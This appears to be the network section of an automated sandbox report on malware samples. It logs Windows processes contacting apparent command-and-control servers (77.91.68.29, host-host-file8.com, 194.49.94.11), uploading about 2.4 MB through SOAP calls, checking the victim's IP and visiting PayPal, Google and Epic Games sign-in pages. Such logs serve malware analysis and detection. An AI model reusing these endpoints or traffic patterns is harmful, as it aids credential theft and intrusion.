cookie: enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=cspreportnodeweb; x-pp-s=eyJ0IjoiMTY5ODY0ODU1NjU0OCIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg15.slc; ts=vreXpYrS%3D1793342956%26vteXpYrS%3D1698650356%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; TLTSID=62544276781500915456071760049843

Response

HTTP/2.0 200

cache-control: max-age=0, no-cache, no-store, must-revalidate
content-type: image/gif
correlation-id: 0769856926034
date: Mon, 30 Oct 2023 06:49:22 GMT
expires: Mon, 30 Oct 2023 06:49:22 GMT
p3p: CP="CAO IND OUR SAM UNI STA COR COM"
paypal-debug-id: 0769856926034
pragma: no-cache
server: ECAcc (frc/4CB9)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: ts=vreXpYrS%3D1793256562%26vteXpYrS%3D1698650362%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew;Expires=Thu, 29 Oct 2026 06:49:22 GMT;domain=.paypal.com;path=/;secure;HttpOnly;
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4;Expires=Thu, 29 Oct 2026 06:49:22 GMT;domain=.paypal.com;path=/;secure;
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000000769856926034-7e5a36d7caae0e0a-01
vary: Accept-Encoding
GET

https://t.paypal.com/ts?v=1.8.7&t=1698648561353&g=0&page=main%3Aauthchallenge%3A%3Asignin&pgst=1698648501523&calc=0752753582382&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=236cbef091eb49f2acf1cee5cc5ead9e&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&xe=107585&xt=135393&view=%7B%22t10%22%3A0%2C%22t11%22%3A31000%2C%22nt%22%3A%22manual%22%7D&ads_client_data=Navigator(appCodeName%3DMozilla%7CappName%3DNetscape%7CappVersion%3D5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7CuserAgent%3DMozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7Cwebdriverfalse%7CdeviceMemoryundefined%7Cgeolocation(Available)%7Clanguage%3Den-US%7ConLine%3Dtrue%7Cplatform%3DWin32%7Cproduct%3DGecko)%7CHistory(1)%7Cscreen(1280%2C720%2C1280%2C680%2C24%2C24)%7Cwindow(Width%3D800%7Cheight%3D556%7CmozRTCPeerConnection%3Dundefined%7CChrome%3D%5Bobject%20Object%5D%7CcallPhantom%3Dundefined%7C_phantom%3Dundefined%7Cstr%3Dundefined%7Clength%3D1%7CdevicePixelRatio%3D1)%7CloginPresent(false)%7CloginTitle()%7Creferrer()%7Cplugins%3A(Shockwave%20Flash%20%7C%20Flash.ocx%20%7C%20Shockwave%20Flash%2025.0%20r0%20%7C%20)(Edge%20PDF%20Viewer%20%7C%20%20%7C%20Portable%20Document%20Format%20%7C%20)%7ChardwareConcurrency(2)%7CmozLockOrientation(undefined)%7CmozUnlockOrientation(undefined)%7CmozOrientation(undefined)%7CError(TypeError%3A%20Unable%20to%20get%20property%20'0'%20of%20undefined%20or%20null%20reference)&res=%7B%7D&e=pf

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /ts?v=1.8.7&t=1698648561353&g=0&page=main%3Aauthchallenge%3A%3Asignin&pgst=1698648501523&calc=0752753582382&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=236cbef091eb49f2acf1cee5cc5ead9e&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&xe=107585&xt=135393&view=%7B%22t10%22%3A0%2C%22t11%22%3A31000%2C%22nt%22%3A%22manual%22%7D&ads_client_data=Navigator(appCodeName%3DMozilla%7CappName%3DNetscape%7CappVersion%3D5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7CuserAgent%3DMozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7Cwebdriverfalse%7CdeviceMemoryundefined%7Cgeolocation(Available)%7Clanguage%3Den-US%7ConLine%3Dtrue%7Cplatform%3DWin32%7Cproduct%3DGecko)%7CHistory(1)%7Cscreen(1280%2C720%2C1280%2C680%2C24%2C24)%7Cwindow(Width%3D800%7Cheight%3D556%7CmozRTCPeerConnection%3Dundefined%7CChrome%3D%5Bobject%20Object%5D%7CcallPhantom%3Dundefined%7C_phantom%3Dundefined%7Cstr%3Dundefined%7Clength%3D1%7CdevicePixelRatio%3D1)%7CloginPresent(false)%7CloginTitle()%7Creferrer()%7Cplugins%3A(Shockwave%20Flash%20%7C%20Flash.ocx%20%7C%20Shockwave%20Flash%2025.0%20r0%20%7C%20)(Edge%20PDF%20Viewer%20%7C%20%20%7C%20Portable%20Document%20Format%20%7C%20)%7ChardwareConcurrency(2)%7CmozLockOrientation(undefined)%7CmozUnlockOrientation(undefined)%7CmozOrientation(undefined)%7CError(TypeError%3A%20Unable%20to%20get%20property%20'0'%20of%20undefined%20or%20null%20reference)&res=%7B%7D&e=pf HTTP/2.0
host: t.paypal.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=cspreportnodeweb; x-pp-s=eyJ0IjoiMTY5ODY0ODU1NjU0OCIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg15.slc; ts=vreXpYrS%3D1793342956%26vteXpYrS%3D1698650356%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; TLTSID=62544276781500915456071760049843

Response

HTTP/2.0 200

cache-control: max-age=0, no-cache, no-store, must-revalidate
content-type: image/gif
correlation-id: 8a08e0db71e5b
date: Mon, 30 Oct 2023 06:49:23 GMT
expires: Mon, 30 Oct 2023 06:49:23 GMT
p3p: CP="CAO IND OUR SAM UNI STA COR COM"
paypal-debug-id: 8a08e0db71e5b
pragma: no-cache
server: ECAcc (frc/4D0A)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: ts=vreXpYrS%3D1793256563%26vteXpYrS%3D1698650363%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew;Expires=Thu, 29 Oct 2026 06:49:23 GMT;domain=.paypal.com;path=/;secure;HttpOnly;
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4;Expires=Thu, 29 Oct 2026 06:49:23 GMT;domain=.paypal.com;path=/;secure;
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000008a08e0db71e5b-906b714327b098cd-01
vary: Accept-Encoding
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ijffs.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 275
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:49:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ntvhtjk.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 218
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:49:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://prmcvlyc.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 127
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:49:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ewfecbot.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 112
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:49:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xtwrvv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 333
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:49:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ksohd.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 126
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:49:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jgnydys.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 142
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:49:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

newassets.hcaptcha.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

newassets.hcaptcha.com

IN A

Response

newassets.hcaptcha.com

IN A

104.19.218.90

newassets.hcaptcha.com

IN A

104.19.219.90
GET

https://newassets.hcaptcha.com/captcha/v1/19a0fd9/static/hcaptcha.html

MicrosoftEdgeCP.exe

Remote address:

104.19.218.90:443

Request

GET /captcha/v1/19a0fd9/static/hcaptcha.html HTTP/2.0
host: newassets.hcaptcha.com
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:22 GMT
content-type: text/html
cf-ray: 81e1b7cb6bd61c7c-AMS
cf-cache-status: HIT
access-control-allow-origin: *
age: 105779
cache-control: max-age=1209600
last-modified: Thu, 26 Oct 2023 14:16:30 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
via: 1.1 eda2686dad6c190a4b0f18db47e39f0a.cloudfront.net (CloudFront)
cross-origin-embedder-policy: credentialless
cross-origin-resource-policy: cross-origin
x-amz-cf-id: R6ttS0yO_bd42oJjVGNPB4gOihzIJocNfgTxcr7IbIt-KpCxEEihVg==
x-amz-cf-pop: AMS1-P3
x-amz-server-side-encryption: AES256
x-amz-version-id: QlVZRO0rxbqhmisPpjtxuNyZLC.eCv7B
x-cache: Hit from cloudfront
x-content-type-options: nosniff
vary: Accept-Encoding
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
GET

https://newassets.hcaptcha.com/captcha/v1/19a0fd9/hcaptcha.js

MicrosoftEdgeCP.exe

Remote address:

104.19.218.90:443

Request

GET /captcha/v1/19a0fd9/hcaptcha.js HTTP/2.0
host: newassets.hcaptcha.com
accept: application/javascript, */*;q=0.8
referer: https://newassets.hcaptcha.com/captcha/v1/19a0fd9/static/hcaptcha.html
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://newassets.hcaptcha.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:22 GMT
content-type: application/javascript
cf-ray: 81e1b7ce3dc41c7c-AMS
cf-cache-status: HIT
access-control-allow-origin: *
age: 105781
cache-control: max-age=1209600
etag: W/"e06be98cab2cc8ce345b4b2a1694d009"
last-modified: Thu, 26 Oct 2023 14:16:30 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
via: 1.1 7cda9a7fe68f979d43fe743d9fbd0db4.cloudfront.net (CloudFront)
cross-origin-resource-policy: cross-origin
x-amz-cf-id: OenP3rLuf3uTSU3RxSnNKp_T3cjRdT7xbrvpyHyo7XpLAOFBGH-UZA==
x-amz-cf-pop: AMS1-P3
x-amz-server-side-encryption: AES256
x-amz-version-id: UKTZX5KrDdhEiNN0CNv.hmeBgmLTJR.L
x-cache: Hit from cloudfront
x-content-type-options: nosniff
vary: Accept-Encoding
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
GET

https://newassets.hcaptcha.com/c/78ee6fc/hsj.js

MicrosoftEdgeCP.exe

Remote address:

104.19.218.90:443

Request

GET /c/78ee6fc/hsj.js HTTP/2.0
host: newassets.hcaptcha.com
accept: application/javascript, */*;q=0.8
referer: https://newassets.hcaptcha.com/captcha/v1/19a0fd9/static/hcaptcha.html
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:32 GMT
content-type: application/javascript
cf-ray: 81e1b807be0f1c7c-AMS
cf-cache-status: HIT
access-control-allow-origin: *
age: 403283
cache-control: max-age=3024000
etag: W/"fe115aeedbed323b4bf761d0d63cb6bf"
last-modified: Wed, 11 Oct 2023 15:52:15 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
via: 1.1 eda2686dad6c190a4b0f18db47e39f0a.cloudfront.net (CloudFront)
cross-origin-resource-policy: cross-origin
x-amz-cf-id: G1TeSBZfnFcqC2xwLYAkwgkdiqf9QQgN92TMSQ_8qFmE51wx_67yeA==
x-amz-cf-pop: AMS1-P3
x-amz-server-side-encryption: AES256
x-amz-version-id: PLMjTh3CpKME5lneMJqDYBYqBxdYpUNO
x-cache: Hit from cloudfront
x-content-type-options: nosniff
vary: Accept-Encoding
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
DNS

171.62.40.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.62.40.149.in-addr.arpa

IN PTR

Response

171.62.40.149.in-addr.arpa

IN PTR

unn-149-40-62-171 datapacketcom
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

90.218.19.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.218.19.104.in-addr.arpa

IN PTR

Response
DNS

161.19.199.152.in-addr.arpa

Remote address:

8.8.8.8:53

Request

161.19.199.152.in-addr.arpa

IN PTR

Response
DNS

api.ipify.org

2D8A.exe

Remote address:

8.8.8.8:53

Request

api.ipify.org

IN A

Response

api.ipify.org

IN CNAME

api4.ipify.org

api4.ipify.org

IN A

173.231.16.77

api4.ipify.org

IN A

64.185.227.156

api4.ipify.org

IN A

104.237.62.212
GET

https://api.ipify.org/

2D8A.exe

Remote address:

173.231.16.77:443

Request

GET / HTTP/1.1
Accept: text/html; text/plain; */*
Host: api.ipify.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.25.1
Date: Mon, 30 Oct 2023 06:49:30 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Vary: Origin
POST

http://194.49.94.11/

2FDC.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 194.49.94.11
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 30 Oct 2023 06:49:23 GMT
POST

http://194.49.94.11/

2FDC.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 194.49.94.11
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 30 Oct 2023 06:49:29 GMT
POST

http://194.49.94.11/

2FDC.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 194.49.94.11
Content-Length: 2386940
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 30 Oct 2023 06:49:40 GMT
POST

http://194.49.94.11/

2FDC.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 194.49.94.11
Content-Length: 2386932
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 30 Oct 2023 06:49:42 GMT
DNS

77.16.231.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

77.16.231.173.in-addr.arpa

IN PTR

Response

77.16.231.173.in-addr.arpa

IN PTR

apiipifyorg
DNS

11.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.94.49.194.in-addr.arpa

IN PTR

Response
DNS

host-file-host6.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

95.214.26.28
DNS

host-host-file8.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

95.214.26.28
POST

http://host-host-file8.com/

Explorer.EXE

Remote address:

95.214.26.28:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://idnlef.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 218
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Mon, 30 Oct 2023 06:49:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
DNS

23.149.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.149.64.172.in-addr.arpa

IN PTR

Response
GET

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:_mDlHTJm9LOuksrrW5dtRaMcF5ZuKQ:s3pVq-SSjVto4rfT

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
x-frame-options: DENY
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
set-cookie: __Host-GAPS=1:YUFW61I-sF8aYiOEBdmv-xOvFSoJsA:vqSeBwieYT7y_CQL; Expires=Wed, 29-Oct-2025 06:49:27 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
x-ua-compatible: IE=edge
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:49:27 GMT
strict-transport-security: max-age=31536000; includeSubDomains
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
content-security-policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
cross-origin-resource-policy: same-site
cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

28.26.214.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.26.214.95.in-addr.arpa

IN PTR

Response
DNS

hcaptcha.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

hcaptcha.com

IN A

Response

hcaptcha.com

IN A

104.19.219.90

hcaptcha.com

IN A

104.19.218.90
POST

https://hcaptcha.com/checksiteconfig?v=19a0fd9&host=www.epicgames.com&sitekey=5928de2d-2800-4c58-be91-060e5a6aa117&sc=1&swa=0&spst=0

MicrosoftEdgeCP.exe

Remote address:

104.19.219.90:443

Request

POST /checksiteconfig?v=19a0fd9&host=www.epicgames.com&sitekey=5928de2d-2800-4c58-be91-060e5a6aa117&sc=1&swa=0&spst=0 HTTP/2.0
host: hcaptcha.com
origin: https://newassets.hcaptcha.com
referer: https://newassets.hcaptcha.com/captcha/v1/19a0fd9/static/hcaptcha.html
accept-language: en-US
accept: application/json
content-type: text/plain
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-length: 0
cache-control: no-cache

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:29 GMT
content-type: application/json
access-control-allow-origin: https://newassets.hcaptcha.com
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control, Content-Type, DNT, Referer, User-Agent, challenge-bypass-token, cf-chl-bypass, challenge-bypass-token, challenge-bypass-host, challenge-bypass-path
access-control-allow-methods: GET, HEAD, POST, OPTIONS
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
cf-ray: 81e1b7f7bee2b93f-AMS
content-encoding: br
alt-svc: h3=":443"; ma=86400
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

2FDC.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/geoip

2FDC.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 30 Oct 2023 06:49:31 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 365
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DWkYCtFc19AgSbjhBmQp6qlYURYJ5LLFRvg6mqjjauF5gVCpFcG1zn09t7qGqB0jA1Iziq2QMM6syJAo%2FZ%2BhZiakZA6%2FfZQh5noYdGDq%2FJMnkNjhij4yKvTGKg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 81e1b800a9ce661c-AMS
alt-svc: h3=":443"; ma=86400
DNS

31.12.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.12.26.104.in-addr.arpa

IN PTR

Response
DNS

164.169.70.146.in-addr.arpa

Remote address:

8.8.8.8:53

Request

164.169.70.146.in-addr.arpa

IN PTR

Response

164.169.70.146.in-addr.arpa

IN PTR

millacongoscom
DNS

i.ytimg.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

142.251.39.118

i.ytimg.com

IN A

172.217.168.214

i.ytimg.com

IN A

172.217.23.214

i.ytimg.com

IN A

216.58.214.22

i.ytimg.com

IN A

142.250.179.150

i.ytimg.com

IN A

142.251.36.54

i.ytimg.com

IN A

172.217.168.246

i.ytimg.com

IN A

142.250.179.182

i.ytimg.com

IN A

142.250.179.214

i.ytimg.com

IN A

142.251.36.22
